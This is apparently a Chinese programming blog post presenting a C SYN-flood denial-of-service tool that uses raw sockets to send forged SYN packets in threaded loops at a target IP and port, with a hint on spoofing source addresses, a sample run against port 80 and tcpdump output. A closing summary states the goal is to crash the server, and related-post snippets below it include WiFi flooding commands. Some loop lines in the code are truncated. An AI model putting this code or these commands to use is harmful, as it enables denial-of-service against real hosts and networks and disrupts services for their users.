linux洪水攻击路由器,Linux网络编程之SYN洪水攻击

最新推荐文章于 2024-04-17 13:28:13 发布
最新推荐文章于 2024-04-17 13:28:13 发布
阅读量242 收藏
点赞数
文章标签: linux洪水攻击路由器

/**

SYN洪水攻击原理:

TCP建立连接的时候要经过三次握手

(1)源主机向目的主机发送SYN

(2)目的主机收到报方后向源主机发送一个ACK

(3)当源主机发收报文之后向目的主机发送一个ACK,表示已经收到目的主机的ACK

这时候才能够通信

可以在目的主机发送完ACK后,源主机不再像目的主机发送ACK,这样目的主机一直超时等待,即建立半连接。

也可以发送大量的SYN包,让目的主机处理不过来,来消耗目的主机的带宽

**/

#define MAXCHILD 2

#define K 1024

#define DATUML 1*K

static int PROTO_TCP=-1;//TCP协议类型

static unsigned long dest=0;//目的地址,32位二进制

static int dest_port=0;

static int rawsock=-1;//原始套接字

static int alive=0;

//整个IP报文包括3个部分,IP首部,TCP首部,TCP数据部分

struct dosseg_t {

struct ip iph;//IP头部

struct tcphdr tcph;//TCP头部

}dosseg;

struct pseudo_header    //needed for checksum calculation

{

unsigned int source_address;//源地址

unsigned int dest_address;//目的地址

unsigned char placeholder;

unsigned char protocol;//协议号

unsigned short tcp_length;//tcp包长度

struct tcphdr tcp;//tcp首部

};//一起计算校验和

//计算校验和

static unsigned short DoS_cksum(unsigned short *data,int length){

register int left=length;

register unsigned short*word=data;

register int sum=0;

unsigned short ret=0;

//计算偶数字节

while(left>1){

sum+=*word++;

left-=2;

}

if(left==1){

*(unsigned char*)(&ret)=*(unsigned char*)word;

sum+=ret;

}

sum=(sum>>16)+(sum&0xffff);

sum+=(sum>>16);

ret=~sum;

return ret;

}

static inline long myrandom(int begin,int end){//根据不同的种子,随机出不同的数

int gap=end-begin+1;

int ret=0;

//系统时间初始化

srand((unsigned)time(0));

ret=random()%gap+begin;//介于begin与end之间的值

return ret;

}

static void DoS_tcp(){

struct in_addr src;//源地址

struct in_addr dst;//目的地址

int i;

struct sockaddr_in to;

//首先填充IP首部

dosseg.iph.ip_v=4;//IP版本号

dosseg.iph.ip_hl=5;//IP首部长度,以4字节为单位

dosseg.iph.ip_tos=0;//服务类型

dosseg.iph.ip_len=(sizeof(struct ip)+sizeof(struct tcphdr));//IP报文的总长度

dosseg.iph.ip_id=htons(getpid());//IP报文标识,进程PID

dosseg.iph.ip_off=0;//段偏移

dosseg.iph.ip_ttl=myrandom(200,255);//生存值

dosseg.iph.ip_p=PROTO_TCP;//协议类型

dosseg.iph.ip_sum=0;//检验和

src.s_addr=inet_addr("222.27.253.108");//htonl(myrandom(0,65535))

dosseg.iph.ip_src=src;

dst.s_addr=dest;

dosseg.iph.ip_dst=dst;

dosseg.iph.ip_sum=DoS_cksum((unsigned short*)&dosseg.iph,sizeof(dosseg.iph));//检验和,IP首部长度

//填充TCP报文的首部

dosseg.tcph.source=htons(myrandom(0,65535));

dosseg.tcph.dest=htons(dest_port);

dosseg.tcph.seq=htonl((unsigned long)myrandom(0,65535));

dosseg.tcph.ack_seq=htons(myrandom(0,65535));

dosseg.tcph.syn=1;

dosseg.tcph.urg=1;

dosseg.tcph.fin=0;

dosseg.tcph.doff=5;//指的是TCP的首部长度为20字节

dosseg.tcph.window=htons(myrandom(0,65535));

dosseg.tcph.check=0;

dosseg.tcph.rst=0;

dosseg.tcph.urg_ptr=htons(myrandom(0,65535));

to.sin_family=AF_INET;

to.sin_addr.s_addr=dest;

to.sin_port=htons(dest_port);

//TCP Header

//     dosseg.tcph.source = htons (1234);

//     dosseg.tcph.dest = htons (80);

//     dosseg.tcph.seq = 0;

//     dosseg.tcph.ack_seq = 0;

//     dosseg.tcph.doff = 5;        /* first and only tcp segment */

//     dosseg.tcph.fin=0;

//     dosseg.tcph.syn=1;

//     dosseg.tcph.rst=0;

//     dosseg.tcph.psh=0;

//     dosseg.tcph.ack=0;

//     dosseg.tcph.urg=0;

//     dosseg.tcph.window = htons (5840);    /* maximum allowed window size */

//     dosseg.tcph.check = 0;/* if you set a checksum to zero, your kernel's IP stack

//                 should fill in the correct checksum during transmission */

//     dosseg.tcph.urg_ptr = 0;

struct  pseudo_header psh;

psh.source_address = inet_addr("222.27.253.108");

psh.dest_address =inet_addr("222.27.253.1");

psh.placeholder = 0;

psh.protocol = IPPROTO_TCP;//TCP协议号

psh.tcp_length = htons(20);//TCP首部长度

memcpy(&psh.tcp , &dosseg.tcph , sizeof (struct tcphdr));

dosseg.tcph.check = DoS_cksum( (unsigned short*) &psh , sizeof (struct pseudo_header));//伪首部长度一起计算校验和

//发送数据

int size=sendto(rawsock,&dosseg,4*dosseg.iph.ip_hl+sizeof(struct

tcphdr),0,(struct sockaddr*)&to,sizeof(struct sockaddr));

if(size<0){

perror("sendto");

}

//printf("size=%d\n",size);

}

//线程函数

static void DoS_fun(unsigned long ip){

while(alive){

DoS_tcp();

}

}

static void DoS_sig(){

alive=0;

printf("-------exit----\n");

return;

}

int main(int argc,char*argv[]){

struct hostent* host=NULL;//主机的相关信息

struct protoent*protocol=NULL;//协议的相关信息

char protoname[]="tcp";

struct in_addr dst;

int i=0;

int err=-1;

alive=1;

pthread_t pthread[MAXCHILD];//线程数组

signal(SIGINT,DoS_sig);//信号处理函数

if(argc<3){

return -1;

}

//获取UDP的协议类型

protocol=getprotobyname(protoname);

if(protocol==NULL){

perror("get protobyname");

return -1;

}

PROTO_TCP=protocol->p_proto;

dest=inet_addr(argv[1]);//得到目的地址

if(dest==INADDR_NONE){

host=gethostbyname(argv[1]);

if(host==NULL){

perror("gethostbyname");

}

memcpy((char*)&dst,host->h_addr,host->h_length);

dest=dst.s_addr;

}

dest_port=atoi(argv[2]);

//建立原始套接字

rawsock=socket(AF_INET,SOCK_RAW,PROTO_TCP);

printf("rawsock=%d\n",rawsock);

if(rawsock<0){

perror("socket error");

}

//设置手工填写IP首部

setsockopt(rawsock,SOL_IP,IP_HDRINCL,"1",sizeof("1"));

//建立多线程发送UDP包

for(i=0;i

err=pthread_create(&pthread[i],NULL,DoS_fun,NULL);

}

//等待线程结束

for(i=0;i

pthread_join(pthread[i],NULL);

}

close(rawsock);

}

说明:TCP首部校验和的计算除了TCP首部还包括源地址,目的地址,协议号和首部长度12个字节的伪首部. SYN域需要设置为1. 如果要伪装IP,就随机出一个IP地址发送。

80号端口提供http服务.

运行结果:

[root@localhost 13章原始套接字]# ./tcp-attack 222.27.253.1 80

tcpdump抓到发出的TCP包:

19:28:26.196380 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.197231 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.198138 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.199066 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.199914 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.200858 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.201708 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.202553 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.203398 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.218594 arp who-has 202.118.185.87 tell 202.118.185.1

19:28:26.221212 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.222115 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

19:28:26.222959 IP 222.27.253.1.http > 222.27.253.108.26603: R 0:0(0) ack 1 win 0

.253.108.10623 > 222.27.253.1.http: S 10623:10623(0) win 10623 urg 10623

主机返回的ACK包:

19:30:59.004230 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.005072 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.005913 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.006754 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.007684 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.008527 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.009371 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.011881 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.013792 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.014636 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.015479 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.016321 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.017166 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.018012 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.018856 IP 222.27.253.1.http > 222.27.253.108.60939: R 0:0(0) ack 1 win 0

19:30:59.019767 IP 222.27.253.1.http > 222.27.253.1 win 0

总结:

本文主要介绍了基于TCP和SYN攻击,创建很多半开连接来减少服务器的资源,最终使服务器崩溃,达到攻击的目的。

嘉禾博研王永杰
关注
Linux 操作系统原理 — netfilter/iptables 流量处理框架
烟云的计算
05-25 2233
即:内网 IP 地址向外访问 Internet 时,发起访问的内网 IP 地址转换为指定的对外 IP 地址(可指定具体的服务以及相应的端口或端口范围),这使内网的多部主机可以通过同一个有效的公网 IP 地址访问外部网络。IP 网络有公网与私网的区分,企业内网使用私网 IP,Internet 使用公网 IP。DNAT(Destination Network Transform,目的地址转换)与 SNAT 相对,当外部网络访问内部网络时,进来的 IP 数据包会被改变 dstIP 地址。
​Kali-linux攻击路由器
2301_77162959的博客
05-27 2946
前面介绍的各种工具,都是通过直接破解密码,来连接到无线网络。由于在一个无线网络环境的所有设备中,路由器是最重要的设备之一。
Kali-linux攻击路由器
weixin_33699914的博客
04-18 8913
前面介绍的各种工具,都是通过直接破解密码,来连接到无线网络。由于在一个无线网络环境的所有设备中,路由器是最重要的设备之一。通常用户为了保护路由器的安全,通常会设置一个比较复杂的密码。甚至一些用户可能会使用路由器的默认用户名和密码。但是,路由器本身就存在一些漏洞。如果用户觉得对复杂的密码着手可能不太容易。这时候,就可以利用路由器自身存在的漏洞实施攻击。本节将介绍使用Routerpwn工具实施攻击...
Linux网络编程洪水攻击详解
01-09
洪水攻击详解   ①注解:洪水攻击(FLOOD ATTACK)是指利用计算机网络技术向目标主机发送大量无用的数据报文,使得目标主机忙于处理无用的数据报文而无法提供正常服务的网络行为。   主要原理:利用了网络协议中安全机制或者直接用十分简单的ping资源的方法来对主机造成影响。   攻击手段:使用畸形报文让目标机处于处理或者等待,使用原始套接字进行程序设计。   分类:   ICMP回显攻击,利用原始套接字发送大量回显请求或者回显响应的数据,由于此数据协议栈默认是必须处理的,因此有影响   UDP,向目标主机UDP端口发送UDP报文,由于目标机需要对端口进行处理   SYN,利用
Linux下防御ddos攻击_公司linux系统中对外暴露的服务需要防止syn洪水攻击及cookie攻击,决定安全加固系(1)
最新发布
2401_84301315的博客
04-17 720
usr/local/ddos/ddos.sh -k n //杀掉连接数大于n的连接。http://www.inetbase.com/scripts/ddos/install.sh //下载DDoS deflate。APF_BAN=1 //使用APF还是iptables。IGNORE_IP_LIST=“/usr/local/ddos/ignore.ip.list” //IP地址白名单。/usr/local/ddos/ddos.sh -c //按照配置文件创建一个执行计划。
Kali Linux mdk3WiFi洪水攻击 攻击路由器 生成虚假WiFi WiFi身份验证攻击可使连接WiFi的手机掉线重连抓包
Linux_bai的博客
03-26 8763
将无线网卡转换为监听模式 airmon-ng start wlan0 查找附近无线网络 airodump-ng wlan0mon Authentication DoS:(洪水攻击,又叫做身份验证攻击) mdk3 wlan0mon a -a 路由器Mac地址 这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模
网络与系统安全笔记------网络攻击
博客
01-18 1725
网络与系统安全笔记------网络攻击
网络隐身学习概述
aaaxinxin_的博客
01-25 6507
网络隐身 分类 IP地址欺骗、Mac地址欺骗、网络地址转换、代理隐藏、账号盗用和僵尸主机 一、 IP地址欺骗 释义 指行动产生的IP数据包为伪造的源IP地址,以便冒充其他系统或发件人的身份。这是一种黑客攻击形式,黑客使用一台计算机上网,而借用另外一台机器的IP地址,伪造自身的IP地址向目标系统发送恶意请求,造成目标系统受到攻击却无法确认攻击源,或者取得目标系统的信任以便获取机密信息。防火墙可以识别这种IP欺骗。 原理 IP欺骗是在服务器不存在任何漏洞的情况下,通过利用TCP/IP协议本身存在的一些缺
SDN中基于监督学习的抗DDoS攻击方法
工程科学与技术,国际期刊35(2022)101176基于监督学习技术宋王a,胡亚鹏,胡安·费尔南多·巴拉雷佐a,卡丽娜·戈麦斯·查韦斯a,阿克拉姆·胡拉尼a,Sithamparanathan Kandeepana,Muhammad Rizwan Asgharb,...
TCP-IP详解卷二:实现
03-23
TCPSYN洪水攻击、IP欺骗等问题及相应的防御策略值得深入研究。 10. **实际案例分析**:作者可能会通过实际的网络通信场景和案例,解析TCP/IP协议在各种情况下的工作原理,帮助读者更好地理解和应用所学知识。 总...
多线程自动化SynFlood[Linux下源码]
12-22
这个代码的原版是从某个论坛上很多年前的帖子翻出来的,本人还不会熟练使用makefile,所以直接在他上面进行了开发。我也不知道很多文件有什么用,src文件夹中有代码,include中包含了头文件信息。 使用说明放在压缩包内的readme.txt,里面有详细的使用说明,我给他补充了很多功能,绝对好用,满足95%你的尝试欲望。更多功能待我有时间写好了上传,里面有我的联系方式,如果有问题请联系我。
服务器SYN洪水攻击原理和防御办法-SynAttackProtect保护机制
我是飞飞啊,不一定温柔,但一定自由
02-20 2687
服务器SYN洪水攻击原理和防御办法-SynAttackProtect保护机制一、设置SynAttackProtect键值步骤二、防止SYN洪水攻击修改项说明三、特别注意 SYN洪水攻击是利用客户端和服务端建立TCP连接,服务器必须收到客户端返回的一个ACK包才完成建立连接,否则一直处于等待的缺陷,连续发送SYN报文给服务器端请求建立TCP连接,却不回应(这种情况称为半开连接),当半开连接数达到系统允许的最大值时,系统不再接受建立连接请求,即后面的用户无法访问到服务器。 拿网站服务器来说就是无法打开网页,
SYN洪流攻击实验
Kongfu_Lee的博客
09-15 1466
模拟SYN洪流攻击实验 实验目的: 通洪流攻击使web服务器的CPI使用率急剧增加,无法处理正常用户发来的请求 实验准备: 一台装有windows 虚拟机模拟靶机 一台kali虚拟机模拟攻击机 实验环境搭建: 1、在服务器上开启使用tcp协议的服务软件(这里开启的是PhpStudy) 2、查看web服务器的ip,确认kali可以通过IP地址正常访问web服务器的网页 实验步骤: 1、使用nmap工具查看web服务器开放的端口 2、kali使用hping3工具开始SYN洪流攻击,hping3 靶机IP地址
『网络协议攻防实验』SYN Flood攻击
Ho1aAs‘s Blog
07-28 2391
前言 靶机1:seedubuntu 12.01,IP:192.168.199.138 靶机2:WindowsXP SP2,IP:192.168.199.135 攻击机:Kali-2020.4,IP:192.168.199.129 工具:netwox 原理 TCP SYN Flood,又称SYN洪泛攻击,是目前最为有效和流行的一种拒绝服务攻击形式,它利用TCP三次握手协议的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而不能够为正常用户提供服务。 SYN Flood攻
Linux下ack攻击脚本,linux 防御SYN攻击步骤详解
weixin_34274601的博客
04-30 292
一、默认syn配置sysctl -a | grep _synnet.ipv4.tcp_max_syn_backlog = 1024net.ipv4.tcp_syncookies = 1net.ipv4.tcp_synack_retries = 5net.ipv4.tcp_syn_retries = 5tcp_max_syn_backlog 是SYN队列的长度,加大SYN队列长度可以容纳更多等待连接...
Linux系列:SYN攻击
NIO4444
10-25 417
在三次握手过程中,Server发送SYN-ACK之后,收到Client的ACK之前的TCP连接称为半连接(half-open connect),此时Server处于SYN_RCVD状态,当收到ACK后,Server转入ESTABLISHED状态。 SYN攻击就是Client在短时间内伪造大量不存在的IP地址,并向Server不断地发送SYN包,Server回复确认包,并等待Client的确认,由于源地址是不存在的,因此,Server需要不断重发直至超时,这些伪造的SYN包将产时间占用未连接队列,导...
Linux下ack攻击脚本,Linux SYN攻击原理和应对方法
weixin_39668965的博客
04-30 2725
TCP自从1974年被发明出来之后,历经30多年发展,目前成为最重要的互联网基础协议,但TCP协议中也存在一些缺陷。SYN攻击就是利用TCP协议的缺陷,来导致系统服务停止正常的响应。SYN攻击原理:TCP在传递数据前需要经过三次握手,SYN攻击的原理就是向服务器发送SYN数据包,并伪造源IP地址。服务器在收到SYN数据包时,会将连接加入backlog队列,并向源IP发送SYN-ACK数据包,并等待...
linux洪水攻击路由器,(20)Linux下ICMP洪水攻击实例
weixin_35840316的博客
05-13 359
(20)Linux下ICMP洪水攻击实例注:所以文章红色字体代表需要特别注意和有问题还未解决的地方,蓝色字体表示需要注意的地方1.本文所介绍的程序平台虚拟机为:Red Hat Enterprise Linux 52.洪水攻击简介洪水攻击指的是利用计算机网络技术向目标机发送大量的无用数据报文,使得目标主机忙于处理无用的数据报文而无法提供正常的服务的网络行为。洪水攻击(FLOOD ATTACK),顾名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值